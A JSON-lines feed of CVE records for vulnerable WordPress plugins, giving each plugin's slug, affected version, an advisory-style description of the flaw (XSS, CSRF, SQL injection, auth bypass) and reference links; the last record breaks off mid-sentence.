{"CVE_ID":"CVE-2022-4754","slug":"easy-facebook-like-box","versionImpact":"4.1.2","description":"The Easy Social Box \/ Page Plugin WordPress plugin through 4.1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2cc0ab2-9bfd-4a09-ac31-bd90e6da12db\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2cc0ab2-9bfd-4a09-ac31-bd90e6da12db\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4385","slug":"wp-private-content-plus","versionImpact":"3.1","description":"The WP Private Content Plus plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1. This is due to missing or incorrect nonce validation on the save_groups() function. This makes it possible for unauthenticated attackers to add new group members via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473452%40wp-private-content-plus&new=2473452%40wp-private-content-plus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473452%40wp-private-content-plus&new=2473452%40wp-private-content-plus&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/238f6d81-78ba-426c-866a-31f9279e4f99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/238f6d81-78ba-426c-866a-31f9279e4f99?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2437","slug":"userpro","versionImpact":"5.1.1","description":"The UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.1.1. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. An attacker can leverage CVE-2023-2448 and CVE-2023-2446 to get the user's email address to successfully exploit this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3cf9f38-c20e-40dc-a7a1-65b0c6ba7925?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3cf9f38-c20e-40dc-a7a1-65b0c6ba7925?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1760","slug":"simply-schedule-appointments","versionImpact":"1.6.6.20","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.6.20. This is due to missing or incorrect nonce validation on the ssa_factory_reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eec9744-6dbd-42bd-b9c5-c9d792cecf4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eec9744-6dbd-42bd-b9c5-c9d792cecf4b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-support.php#L527\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-support.php#L527\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042890\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-support.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042890\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-support.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0867","slug":"email-log","versionImpact":"2.4.8","description":"The Email Log plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 2.4.8 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd15268f-7e06-4e0d-baaf-f27348af61ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd15268f-7e06-4e0d-baaf-f27348af61ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-log\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027872%40email-log&new=3027872%40email-log&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027872%40email-log&new=3027872%40email-log&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2926","slug":"addons-for-elementor","versionImpact":"8.3.7","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 8.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e9beef-4d2b-4004-8db7-4963882e405b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e9beef-4d2b-4004-8db7-4963882e405b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/carousel\\\/loop.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/carousel\\\/loop.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-slider\\\/loop-start.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-slider\\\/loop-start.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-multislider\\\/loop-start.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-multislider\\\/loop-start.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-gridbox-slider\\\/loop-start.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-gridbox-slider\\\/loop-start.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-carousel\\\/loop-start.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-carousel\\\/loop-start.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/device-slider\\\/loop.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/device-slider\\\/loop.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/animated-text\\\/loop.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/animated-text\\\/loop.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/animated-text\\\/loop.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/animated-text\\\/loop.php#L40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7778","slug":"themeisle-companion","versionImpact":"2.10.36","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.10.36 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be83c6be-fb6c-462f-b54a-ca12d6d2581f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be83c6be-fb6c-462f-b54a-ca12d6d2581f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.36\\\/obfx_modules\\\/custom-fonts\\\/custom_fonts_admin.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.36\\\/obfx_modules\\\/custom-fonts\\\/custom_fonts_admin.php#L376\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139233\\\/#file71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139233\\\/#file71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139233\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139233\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9069","slug":"graphicsly","versionImpact":"1.0.2","description":"The Graphicsly \u2013 The ultimate graphics plugin for WordPress website builder ( Gutenberg, Elementor, Beaver Builder, WPBakery ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/343a6dbd-baf5-4de8-ae3e-6954fd3f1556?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/343a6dbd-baf5-4de8-ae3e-6954fd3f1556?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/graphicsly\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/graphicsly\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10184","slug":"streamweasels-kick-integration","versionImpact":"1.1.1","description":"The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-kick-embed shortcode in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/077a31e7-de4b-418f-ac90-5c51a690bc65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/077a31e7-de4b-418f-ac90-5c51a690bc65?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-kick-integration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-kick-integration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176023\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10268","slug":"mp3-music-player-by-sonaar","versionImpact":"5.8","description":"The MP3 Audio Player \u2013 Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sonaar_audioplayer shortcode in all versions up to, and including, 5.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/861d0218-0f0f-4299-a0ff-854832348457?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/861d0218-0f0f-4299-a0ff-854832348457?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188034\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188034\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12166","slug":"ultimate-shortcodes-creator","versionImpact":"2.2.0","description":"The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/admin\\\/class-shortcode-list-table.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/admin\\\/class-shortcode-list-table.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ece9b6d-6802-44b9-9ead-1563286f4ff3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ece9b6d-6802-44b9-9ead-1563286f4ff3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22349","slug":"wp-auctions","versionImpact":"3.7","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows SQL Injection.This issue affects WordPress Auction Plugin: from n\/a through 3.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-sql-injection-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-sql-injection-vulnerability-2?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13841","slug":"builder-shortcode-extras","versionImpact":"1.0.0","description":"The Builder Shortcode Extras \u2013 WordPress Shortcodes Collection to Save You Time plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.0 via the 'bse-elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created with Elementor that they should not have access to.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/builder-shortcode-extras\\\/tags\\\/1.0.0\\\/includes\\\/shortcodes\\\/elementor.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/builder-shortcode-extras\\\/tags\\\/1.0.0\\\/includes\\\/shortcodes\\\/elementor.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/642dc1d3-a008-4af8-ba9e-dbdd37b93126?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/642dc1d3-a008-4af8-ba9e-dbdd37b93126?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2840","slug":"dap-to-autoresponders-daar","versionImpact":"1.0","description":"The DAP to Autoresponders Email Syncing plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dap-to-autoresponders-daar\\\/trunk\\\/infusionsoft_src\\\/phpinfo.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dap-to-autoresponders-daar\\\/trunk\\\/infusionsoft_src\\\/phpinfo.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dap-to-autoresponders-daar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dap-to-autoresponders-daar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ff90774-f5f6-4d9c-9565-1cff31f9bec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ff90774-f5f6-4d9c-9565-1cff31f9bec4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5486","slug":"wp-email-debug","versionImpact":"1.1.0","description":"The WP Email Debug plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the WPMDBUG_handle_settings() function in versions 1.0 to 1.1.0. This makes it possible for unauthenticated attackers to enable debugging and send all emails to an attacker controlled address and then trigger a password reset for an administrator to gain access to an administrator account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-email-debug\\\/trunk\\\/hooks.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-email-debug\\\/trunk\\\/hooks.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3af64a2-3bd6-47af-919e-00c5249dcc74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3af64a2-3bd6-47af-919e-00c5249dcc74?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4752","slug":"wp-opening-hours","versionImpact":"2.3.0","description":"The Opening Hours WordPress plugin through 2.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309799dd-dea7-489d-8d18-b6014534f5af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309799dd-dea7-489d-8d18-b6014534f5af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4384","slug":"photo-contest","versionImpact":"1.0.6","description":"The WordPress Photo Gallery \u2013 Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on the load_images_thumbnail() and edit_gallery() functions. This makes it possible for unauthenticated attackers to edit galleries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-contest\\\/tags\\\/1.0.6\\\/includes\\\/admin\\\/admin-page-galleries.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-contest\\\/tags\\\/1.0.6\\\/includes\\\/admin\\\/admin-page-galleries.php#L102\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1355bc94-7110-4d61-855e-78889e58dcad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1355bc94-7110-4d61-855e-78889e58dcad?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-contest\\\/tags\\\/1.0.6\\\/includes\\\/view\\\/ajax-function.php#L559\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-contest\\\/tags\\\/1.0.6\\\/includes\\\/view\\\/ajax-function.php#L559\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4520","slug":"fv-wordpress-flowplayer","versionImpact":"7.5.37.7212","description":"The FV Flowplayer Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_fv_player_user_video\u2019 parameter saved via the 'save' function hooked via init, and the plugin is also vulnerable to Arbitrary Usermeta Update via the 'save' function in versions up to, and including, 7.5.37.7212 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, and makes it possible to update the user metas arbitrarily, but the meta value can only be a 